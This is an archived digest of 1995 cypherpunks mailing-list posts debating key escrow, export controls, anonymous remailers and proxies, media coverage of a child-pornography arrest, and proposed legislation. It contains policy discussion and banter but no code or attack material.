Date: Thu, 14 Sep 95 08:28:24 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: WAS_tem
Message-ID: <Pine.A32.3.91.950914112732.17274B-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 14 Sep 1995, James A. Donald wrote:


> If you draw a picture using paintbrush of an underage person engaging
> in sexual conduct, you are in violation of this proposed legislation.

Doesn't that directly contradict the stated purpose of existing child 
porn regulation?  That is, doesn't current statute exist in order to 
prevent the exploitation of children, not to mandate morality?

Do the lawyers on the list want to pipe up?

Ben.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMFhKCL5ALmeTVXAJAQG+eAMAstVn+sOOQkEI8ri6/jroSAwA8oCU5Fzu
qRQfeOCnWJxqEeCE75orzaXIJFTIG3+qWdbKlsYNqS5MglPfI70Iw0Iw3VEtbHRB
YZ595Aj6WXbBr3Z9SyR0mOCgN1twu2ds
=+t1l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Potocki <potock@cig.mot.com>
Date: Thu, 14 Sep 95 09:38:41 PDT
To: cypherpunks@toad.com
Subject: MIME Security Issues
Message-ID: <199509141641.MAA11889@po_box.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody wish to express any comments regarding MIME security.  I
have read the RFC's and any/all doc's I could find on this issue.  I
understand what the security risks are, but I have been unsuccessful in
my attempts to find info regarding what is being done, or has been done
to correct this.  If I remember correctly, I think I once saw a brief
mention of filters or something.

I am new to this stuff, so any assistance would greatly appreciated.

Thank you,
Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 11:47:24 PDT
To: cme@TIS.COM
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <9509141843.AA21226@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a couple of comments, one on a question and one on an answer.

> 
> >Q: Aren't LEAs worried that strong encryption will make it more
> >difficult for them to catch crooks?

If this is for non-cypherpunks, you should say what an LEA is.  They wouldn't
understand your question.  (Shoot, some cypherpunks are probably going, "Huh?")

> 
> >Q: What's this 'key escrow' thing? 
> >
> >A: Some government agencies have been trying to figure out methods which
> >simultaneously permit US citizens to use strong cryptography against
> >criminal eavesdroppers, while retaining the ease with which LEAs can
> >currently tap your calls. The schemes generally involve something
> >mistitled 'key escrow', in which copies of cryptographic keys would be
> >stored at sites accessible by LEAs.
> 
> 'key escrow' is a code word for government access to the unencrypted
> message.  It is a persistent theme, dating back to the NSA's CCEP in about


You probably need to say what the NSA is, and certainly have to identify CCEP.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: madden@mpi-sb.mpg.de (Peter Madden)
Date: Thu, 14 Sep 95 02:58:03 PDT
To: frissell@panix.com
Subject: Re: Software vs Money Laundering
In-Reply-To: <frissell@panix.com>
Message-ID: <9509140957.AA03082@mpii02024.ag2.mpi-sb.mpg.de>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell's email (Sep 13 17:52:55), in reply to John Young, gives
some problems regarding an AI screening program for detecting illicit
electronic money transfers:

> Not the least of which [problems] is that money launderers can use "AI
> Software" to generate a stream of real and dummy money transfers that
> emulates "normal" money transfers.  Not to mention the fact that
> monopoly money transfer networks that can be surveilled by the Feds
> (FEDWIRE and SWIFT) are not long for this world.  They will be
> replaced by encrypted, open, net-based systems.

There are also more basic problems.  An essential initial stage in the
development of such AI programs, a kind of expert system, is the
analysis of the behaviour of the human "experts". In this case the
experts being the willy money launderers. The program can then,
aledgedly, spot all those trademark traits of the money launderer and
nab him/her.  Trouble is, the program therefore represents a kind of
blue-print of what the aspiring money launder should *not* to do when
making illicit electronic money transfers. Any "expert system" that
operates by recognizing, and acting upon, human behaviour (regardless
of whether or not that be on the net) can be foiled by altering, or
disguising, that behaviour (the "dummy money transfers" mentioned by
DCF would be one way of duping the system).  Of course, the officials
at law will claim rousing successes and cite numerous convictions --
but as with the drug trade, that will only be the tip of the ice-berg
with no real clues as to the size of the base. The tip of the ice-berg
will simply be what the AI program has succeeded in formally "capturing".

Pete


=================================================================

Dr Peter Madden,                                Email: madden@mpi-sb.mpg.de
Max-Planck-Institut fuer Informatik,            Phone: (49) (681) 302-5434
Im Stadtwald, W-66123 Saarbruecken, Germany.       Fax: (49) (681) 302-5401





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 14 Sep 95 09:12:58 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: NSA on GAK
In-Reply-To: <9509141525.AA21098@cantina.verity.com>
Message-ID: <199509141601.MAA06167@calloway.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| 
|           Senate Subcommittee on Technology and the Law
|  Hearing on the Administration's Key Escrow Encryption Standard
| 
|         Written Questions for Vice Admiral McConnell, NSA

| *Questions from Senator Murray:
| 
| Q:    In my office in the Hart building this February, I downloaded
| from the Internet an Austrian program that uses DES encryption.
[...]

| With at least 20 million people hooked up to the
| Internet, how do U.S. export controls actually prevent criminals,
| terrorists, or whoever from obtaining DES encryption software?
| 
| Answer:  Serious users of encryption do not entrust their
| security to software distributed via networks o bulletin boards.
| There is simply too much risk that viruses, Trojan Horses,
| programming errors, and other security flaws may exist in such
| software which could not be detected by the user.  Serious users of
| encryption, those who depend on encryption to protect valuable data
| and cannot afford to take such chances, instead turn to other
| sources in which they can have greater confidence.  Such serious
| users include not only entitles which may threaten U.S. national
| security interests, but also businesses and other major consumers
| of encryption products.  Encryption software distribution via
| Internet, bulletin board, or modem does not undermine the
| effectiveness of encryption export controls.   

	"Help me understand here.  You say that serious users of
encryption don't use software distributed via network.  In that case,
you would have no objection to PGP being exported, as serious users of
encryption don't use it?"










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 14 Sep 95 12:18:11 PDT
To: mark@unicorn.com (Rev. Mark Grant)
Subject: Re: An opportunity not to be missed
In-Reply-To: <Pine.3.89.9509141521.A20169-0100000@unicorn.com>
Message-ID: <199509141913.MAA08819@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	How did they get the logs? Did they have a court order?
And web logs only show the site things come from, not the username things
are coming from.

	If someone wants to set something up on c2.org, you're quite
welcome to. Check out http://www.c2.org (currently under
renovation.. my graphic designer is on vacation so I'm awaiting his
return before we can revamp the graphics, basically.)

	The ecash problem, of course, is a problem.

> 
> On Thu, 14 Sep 1995, Frank Stuart wrote:
> 
> > Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
> > use through the remailers)?  You could set up a web-page with instructions
> > and a list of crimes for which there are rewards.
> 
> Someone already tried that. The cops got a copy of the WWW logs and 
> started investigating everyone who'd looked at the WWW page... So at the 
> least you'd need a bunch of anonymous WWW proxies as well.
> 
> There's also the problem that the current ecash systems do not provide 
> payee anonymity, so if you pay informers with ecash they can be traced if 
> the bank and payer collude.
> 
> 		Mark
> 


-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Thu, 14 Sep 95 09:25:16 PDT
To: cypherpunks@toad.com
Subject: Crimestoppers anon tip mailbox
Message-ID: <199509141625.MAA08120@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
>> use through the remailers)?  You could set up a web-page with instructions
>> and a list of crimes for which there are rewards.
>
>Someone already tried that. The cops got a copy of the WWW logs and 
>started investigating everyone who'd looked at the WWW page...

Right - this was an abduction case in Florida, if memory serves.

> So at the 
>least you'd need a bunch of anonymous WWW proxies as well.

I don't see that as a problem.  I'm about to set up at least one of these
myself, and I believe that there are others around - please correct me
if I'm wrong.

In any case, there needn't be a web page to do the actual reporting.
There can be web pages to advertise, and then a simple maildrop for
the tips.  You could even arrange that the maildrop send everything
to a remailer for delivery to a non-advertised address for an extra
layer of protection (in case someone forgot to use a remailer to send
the tip in the first place, or they screwed up in a way that revealed
their identity).


David C. Lambert
dcl@panix.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFhV8KpplsfgM88VAQHwIgP/eO5eQIb6PgraSAGeoWJ4Jvc3F8tTkY2u
ZiBfuWN3XMu8JRUQOAcW7Vs4lfgBBm7HDHe05mbmczQGsMTzhcLErQ1m1uPup+Xw
LJmbI2hWjxmuTZI14zoTAnTeTJt3L2XLwl7BPpkWkB7EIrERpua2FYIfdqArFO4e
AxEsD+ybA/k=
=pcn4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 14 Sep 95 12:32:24 PDT
To: mnorton@cavern.uark.edu
Subject: Re: GAK
Message-ID: <9509141935.AA09315@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>So would an FBI camcorder in every room of every house.
>The question is where to draw the line, and I'd rather
>let the lines draw themselves, as opposed to having 
>citizens be compelled to draw them.  The telephone
>system, Mr. Freeh's preferred analog, is inherently
>susceptible to tapping, but what if it were not, and
>every telephone were required to be equipped with
>a government tap switch, subuect to warrant, of course?
 
While not every telephone, every telephone switch is required
to be tap capable  - The Digital Telephony Act.  Note there is
provision for the government to pay costs for Telcos to make 
their phones tappable - as yet unfunded by Congress.

The rights of The People have clearly collided with the interests
of Law Enforcement.  Guess who Congress likes better?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 14 Sep 95 09:42:30 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <Pine.LNX.3.91.950914075351.4971A-100000@on-ramp.ior.com>
Message-ID: <9509141640.AA30602@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> Today's Washington Post (9/14) has a front page article on a bust of
>> 12 computer using pedaphiles.
>> NBC news is saying that Janet Reno will have a news conference
>> later this morning.
>> Tomorrow near NIS&T, the workshop on the Federal Key Escrow Standards
>> will be held.
>> Coincidence?

><g> I think not.. Kind of like the coincidence that just before any gun 
>law votes, some maniac goes on a shooting spree.. ;)

Nope, its more likely to be because of the telecommunications bill and the Exon 
ammendment. They are demonstrating the sufficiency of existing laws.

We never used to see kiddie porn on the internet. The net would go balistic if a 
picture of a teen age nude was posted. Recently there has been a flood of hard 
core paedophile material.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 14 Sep 95 10:53:17 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Child Porn, Morphing, and Pointers
In-Reply-To: <ac7db05202021004bc61@[205.199.118.202]>
Message-ID: <9509141753.AA02480@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
 > Keith Henson, amongst others, has long suggested that a good test case will
 > be the _morphing_ of legal images to make them look like child porn.

And of course the subsequent test case on a software product that
automatically morphs a .JPG of a 32-year-old model into an image of an
eight-year-old.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 14 Sep 95 09:59:17 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Alice's Remailer site (was:Re: Digital Fingerprinting)
Message-ID: <9509141659.AA28685@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: patrick@Verity.COM (Patrick Horgan)
> > From: Mac Norton <mnorton@cavern.uark.edu>
> > To: Patrick Horgan <patrick@Verity.COM>
> > On Wed, 13 Sep 1995, Patrick Horgan wrote:

> > > > > Then, in W.Ky., as in Stockbridge, "You can get
> > > > > anything you want..."? :)
> > > Why do I feel like I'm sitting on the group W bench?
> > I don't know, kid, what you in for?
> Encryption.  And they all moved away from me on the group W bench there,
> talking mean hairy eyeballs and all sorts of things until I said, and
> annoying the NSA, and they all moved back, talking about crime, PEM, PGP,
> and liberty and justice for all;)
> Patrick

I've seen various 'Alice Restaurant' pastiches, Alice's NNTP server, Alices 
MIT GUI, etc. I guess it's time to try to do one for crypto....

This song is called Alice's Remailer site and it's about Alice, and the
remailer site, but Alices Remailer site  is not the name of the Remailer 
site, it's the name of the song, and that's why I called this song Alice's
Remailer site.
 
        You can send anything you want through Alices Remailer site.
        You can send anything you want through Alices Remailer site.
        Connect right in it's around the back.
        Halfway down that seventeen inch rack.
        You can be anyone you want through Alice's Remailer site.

etc....




 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 14 Sep 95 13:18:14 PDT
To: cypherpunks@toad.com, gnu
Subject: Corrections to "Ron Plesser's take on NIST GAK"
Message-ID: <9509142018.AA04536@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


There were a few sentences truncated in what I posted yesterday, due
to mistakes on my part.  Here's the corrections.

	John

...
The Administration policy for 40-bit-key encryption will continue
as-is, and no keys will have to be escrowed for such systems.  Mr.
Nelson said that the government's main concern is that strong
encryption products not be available in the mass market.

...
bi-lateral agreements with friendly nations.  In a presentation, Bob
Holleyman of the Business Software Alliance criticized the
Administration's failure to "liberalize export controls on generally
available software employing non-key escrow encryption."  Also, he
stated that the Administration's proposal and the draft criteria
"continue to reflect a misunderstanding of the market place and, if
implemented in anything like their current form, will prevent key
escrow encryption from ever being commercially adopted."  Mr.
Holleyman recommended a number of features for a marketable system,
including a variety of encryption algorithms using at least 64-bit
keys and user specification of a key holder.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas M. Swiss" <tms@TIS.COM>
Date: Thu, 14 Sep 95 11:45:11 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Alice's Remailer site
In-Reply-To: <9509141659.AA28685@toad.com>
Message-ID: <199509141752.NAA12989@ziggy.tis.com>
MIME-Version: 1.0
Content-Type: text/plain



     More noise. Sorry, but I can't resist:

"Peter Trei" <trei@process.com> writes:
>This song is called Alice's Remailer site and it's about Alice, and the
>remailer site, but Alices Remailer site  is not the name of the Remailer 
>site, it's the name of the song, and that's why I called this song Alice's
>Remailer site.
> 
>        You can send anything you want through Alices Remailer site.
>        You can send anything you want through Alices Remailer site.
>        Connect right in it's around the back.
>        Halfway down that seventeen inch rack.
>        You can be anyone you want through Alice's Remailer site.

(with apologies to Arlo...)

You know, if one person, just one person, uses that remailer, they may
think he's just paranoid, and they'll ignore him.

And if two people, two people, do it -- in reply to each other--they may
think they're both crooks but they won't be able to bust either of
them. And if THREE people do it.  Three -- Can you imagine three people
loggin' in, sending mail through Alice's Remailer site and loggin' out?
They may think it's an ORGANIZATION!

And can you imagine FIFTY people a day?  I said FIFTY people a day --
loggin' in, sending mail through Alice's Remailer site and loggin' out?
And friends, they may think it's a MOVEMENT, and that's what it is:

      THE ALICE'S REMAILER SITE ANTI-E-MAIL-SNIFFING MOVEMENT!--

and all you gotta do to join is to flip the bird to those traffic-sniffin'
spooks out there -- With feelin' ...


-Tom Swiss / tms@tis.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 14 Sep 95 10:55:48 PDT
To: cypherpunks@toad.com
Subject: Annonymous Web proxies.
Message-ID: <9509141754.AA30799@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



There has been a lot of debate about setting up of annonymous Web proxies. There 
are many thousand already deployed. Any Web proxy which does not keep logs is 
effectively an annonymous Web proxy.

Just download the CERN server and run it.

http://www.w3.org/hypertext/WWW/Daemon/Status.html


The point about monitoring such sites is an apt one. Iwork under the assumption 
that I am monitored because if I was a spook I would be monitoring me. Most of 
the discoveries of security holes arrive at my door sooner rather than later. I 
would have monitored the communist party for the same reason, it was one of the 
the most obvious place for the soviets to attempt infiltration, the other being 
the authoritarian establishment right.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 14 Sep 95 10:57:10 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: NSA on GAK
Message-ID: <199509141755.NAA23065@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 9/14/95 -0400, Adam Shostack wrote:
>
>	"Help me understand here.  You say that serious users of
>encryption don't use software distributed via network.  In that case,
>you would have no objection to PGP being exported, as serious users of
>encryption don't use it?"

Were that true, then they wouldn't be on the Internet either because the
Internet runs on software distributed over the Internet.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 14 Sep 95 11:03:49 PDT
To: Richard Potocki <potock@cig.mot.com>
Subject: Re: MIME Security Issues
In-Reply-To: <199509141641.MAA11889@po_box.cig.mot.com>
Message-ID: <199509141803.OAA20674@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Richard Potocki writes:
> Does anybody wish to express any comments regarding MIME security.

You are looking for the MOSS specifications. They are fairly obvious
in the way they work.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 14 Sep 95 11:38:59 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: AOL Porno
In-Reply-To: <Pine.SUN.3.91.950914051946.8806B-100000@panix.com>
Message-ID: <Pine.D-G.3.91.950914142830.1918F-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Duncan Frissell wrote:

> Will the federal prosecutors and Fibbies on this list please 
> emphasize that the Internet was not involved in the AOL kiddie porn 
> case.  The Internet has enough opportunities for bad publicity as 
> it is.
> 
> DCF
> 
> "Who wonders:  How it is that CompuServe was able to exist from 1979 
> to the arrival of Prodigy and AOL without major sex, and drugs, and 
> rock and roll problems?"
> 

I would be happy to, but no member of the media has asked me.  I'm 
available for photo ops too!  :-) (for the humor impaired)

I am blasting the Rimm "study" in the next issue of the Federal Lawyer.  
Does that count?  

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 14 Sep 95 11:29:46 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950914054153.8806C-100000@panix.com>
Message-ID: <Pine.D-G.3.91.950914143225.1918G-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Duncan Frissell wrote:

> 
> 
> On Wed, 13 Sep 1995, Black Unicorn wrote:
> 
> > But won't clients insist on proper credentials in one form or another?  
> > Doesn't the practicality and accountability of a centralized authority 
> > (or several authorities) provide the best answer to this?  Who is going 
> > to accept my signature promising that I did indeed get a law degree and 
> > pass the bar?
> 
> An educational institution can certify its own graduates --- it does 
> now.  Competing credentialing institutions is exactly what I would be 
> looking for as opposed to today's coercive monoply.  
> 
> No matter how skilled, it is illegal for an unlicensed person to practice 
> law, medicine, or many other professions in any state.  The nets weaken 
> these restrictions because they allow action at a distance.
>
That's certainly true.  But what about liability insurance?  That's one 
of the key aspects of my retention of a professional.  Being cynical, and 
somewhat knowledgable about human error, I want to be sure there's 
someone to turn to if the advice/treatment/whatever turns out not only to 
be wrong in hindsight, but in foresight.

Having taken, and passed, bar exams in three states (3 for 3 for those of 
you thinking I was forum shopping), I can tell you that they weren't that 
big of a barrier.  You can flunk (over several tries) by failing to 
prepare at all, panicking, being an extremely poor test taker, or, well ...
 
> Note the other effects of the nets.  They make it hard to tell that you 
> *are* working which reduces the impact of regulations of work by 
> "illegal aliens."  Thus if I am wandering through the South of France 
> while writing the 'Great American Novel' I am unlikely to get busted for 
> violation of work restrictions.  The nets expand the number of jobs I 
> can do while innocently wandering the South of France.  I can or will 
> soon be able, for example, to manage a large international corporation 
> from anywhere.
> 
> DCF
> 
> "Who actually prefers Le Massif Central to those hot and crowded southern 
> climes." 
> 
Just wondering about liability issues after state accrediting is dead.

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Thu, 14 Sep 95 11:43:05 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedaphiles, and Terrorists, oh my
Message-ID: <199509141842.OAA22090@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


September 13, 1995
                                
               PRESS BRIEFING BY MIKE MCCURRY

[Snip]                                
        
MR. MCCURRY:  ... [The President]'ll be making some fairly
significant news on Thursday.  So he'll be very busy next
week.
        
Q    News?  What kind of news?
        
Q    News on what?
        
MR. MCCURRY:  You'll see next week.
        
[Snip]
        
Q    What about Thursday --
        
Q    Are you going?
        
MR. MCCURRY:  Half and half, I think.  I'll go -- I think
there are some days that look more political; I don't think
it's necessary for me to be there.
        
Q    What will be the general topic on Thursday?
        
MR. MCCURRY:  On Thursday?  Technology.

[Snip to end]

URL: http://docs.whitehouse.gov/white-house-publications/
1995/09/1995-09-13-press-briefing-by-mike-mccurry.text

----------

Any scuttlebutt that computer security, the Internet or
encryption are the "technology?"

Or related to the NYT spin today on LEA-web-snooping:

   "We are not going to permit exciting new technology to be
   misused to exploit and injure children," Attorney General
   Janet Reno said today in announcing the arrests.

   The culmination of the inquiry by the Federal Bureau of
   Investigatlon comes at a time when the agency has needed
   some favorable attention to offset a string of incidents
   that have cast it in a negative light. Its officials have
   come under fire for their role in the siege at Waco, Tex.,
   the standoff with a white separatist in Idaho and, most
   recently, over an attempt to cover up aspects in the Idaho
   incident.

Or diversion from the allegations of Special Agent Whitehurst
that Feeb lab rats and bosses are corrupt -- tar-morphing even
Golden Boy Freeh.

Pray that kid-loving Reno HRTs the abusive brats.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 14 Sep 95 12:08:42 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: NSA on GAK
In-Reply-To: <199509141755.NAA23065@panix.com>
Message-ID: <Pine.D-G.3.91.950914150100.1918J-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Duncan Frissell wrote:

> At 12:01 PM 9/14/95 -0400, Adam Shostack wrote:
> >
> >	"Help me understand here.  You say that serious users of
> >encryption don't use software distributed via network.  In that case,
> >you would have no objection to PGP being exported, as serious users of
> >encryption don't use it?"
> 
> Were that true, then they wouldn't be on the Internet either because the
> Internet runs on software distributed over the Internet.
> 
And that's what we call double jeopardy.  Not allowed by the Constitution!


> DCF
> 
> 
EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 14 Sep 95 14:58:20 PDT
To: mix-l@jpunix.com
Subject: Mixmaster status changing
Message-ID: <199509142157.OAA10304@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I recently promised to release the next version of Mixmaster (V 2.0.2)
within 48 hours. The situation has changed. The release of the next
version
of Mixmaster will be indefinitely delayed.

There has been an offer to purchase and commercially develop Mixmaster.
This will hasten the development of Mixmaster for other platforms (e.g.
Dos, Windows  Macintosh), and bring significant improvements to the
interface, but I will not compromise on the level of security provided by
Mixmaster. Free client software will continue to be available.

This could be the big breakthrough for remailers, finally thrusting them
out of the hobbyist's closet into the corporate world. We have all known
that remailers would not become widely used by the rest of the word until
they were easy to use. Many corporations also fear freeware because of its
unknown provenance and its lack of support.

I apologize for the delay, but I think that the wait will be worth it. 

   -Lance M. Cottrell <loki@obscura.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFimnfPzr81BVjMVAQEfpQgAktbVCj3f39sXtTHPL/H2qh6xJuSvozv1
YXai2/NOh9Y5+qTYJS0R1u8+xSdzQlwfvbdteeXtqK0Ba9QBa2tIPwo0jVVvnano
eyFSic0+FoPg33geVGO7Opn+RjOIsvz1MXD41mHxB7p9tRClnEuenvTKqjWovHwU
wQX8mDRsz14cqN1x4YN5MtiFZwz+FgqD8r3O/u6eAT032X0KirfPkxwyIFbfOqz4
crxR/P6KJ7GZzxfyYjoAjOSSan1VkAcp11HzmFU37PA/LB8kbKyYxCrfg+grQu+x
cDMGvb/xg6cwD+D/D7RTUT756m4TDpbgzaNy9SIQTAnbAAspZXZ1mA==
=GIrJ
-----END PGP SIGNATURE-----

-- 
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 15:08:17 PDT
To: tms@TIS.COM
Subject: Re: [NOISE] Alice's Remailer site
Message-ID: <9509142204.AA22141@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> And can you imagine FIFTY people a day?  I said FIFTY people a day --
> loggin' in, sending mail through Alice's Remailer site and loggin' out?
> And friends, they may think it's a MOVEMENT, and that's what it is:
> 
>       THE ALICE'S REMAILER SITE ANTI-E-MAIL-SNIFFING MOVEMENT!--
> 
> and all you gotta do to join is to flip the bird to those traffic-sniffin'
> spooks out there -- With feelin' ...
> 
> 
> -Tom Swiss / tms@tis.com
> 


There sure are a lot of us old fogies around here:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 14 Sep 95 15:15:16 PDT
To: cypherpunks@toad.com
Subject: Re: AOL Porno
Message-ID: <199509142214.PAA07197@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:25 AM 9/14/95 -0400, you wrote:
>Will the federal prosecutors and Fibbies on this list please 
>emphasize that the Internet was not involved in the AOL kiddie porn 
>case.  The Internet has enough opportunities for bad publicity as 
>it is.

I watched the local news coverage of that case.  The report was given by an
individual who has made that mistake before.  (He hosts a "Town Hall"
program that exploits various subjects of the day.  He was corrected as to
"AOL not being the Internet" during one of them.  I know, I was the one who
corrected him.)  The coverage showed lots of shots of the various internet
binaries echos (including alt.binaries.pictures.erotica.children, but not
alt.binaries.pictures.cops.), the web including the Penthouse site (as if
Penthouse has kiddy porn), and other unrelated and non-AOL pictures.

The Internet has become the new scapegoat of choice.  The general media
cannot (or is unwilling) to distinguish the difference between electronic
nets.  The Internet is a generic term for them and since when is the media
willing to look beyond the surface?

How does this connect to crypto?  Well, aiding and abetting in a scapegoat
is a capitol crime in this country.  You can be assured that the Department
of Scapegoat Management will link kiddy porn and crypto at some point in the
minds of the generic public. Hopefully that perception can be "headed off at
the pass".  Having cryptography as a means of avoiding crime and criminals
in the perception of the public is a good idea.  The question is how to get
that perception into the minds of the general public before the other meme
can be inplanted by Scapegoat management and the other TLAa? 

>"Who wonders:  How it is that CompuServe was able to exist from 1979 
>to the arrival of Prodigy and AOL without major sex, and drugs, and 
>rock and roll problems?"

I think the six-dot-three filenames has something to do with it...
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 14 Sep 95 12:24:35 PDT
To: cypherpunks@toad.com
Subject: Things the LEAs don't want to admit.
Message-ID: <199509141920.PAA55734@tequesta.gate.net>
MIME-Version: 1.0
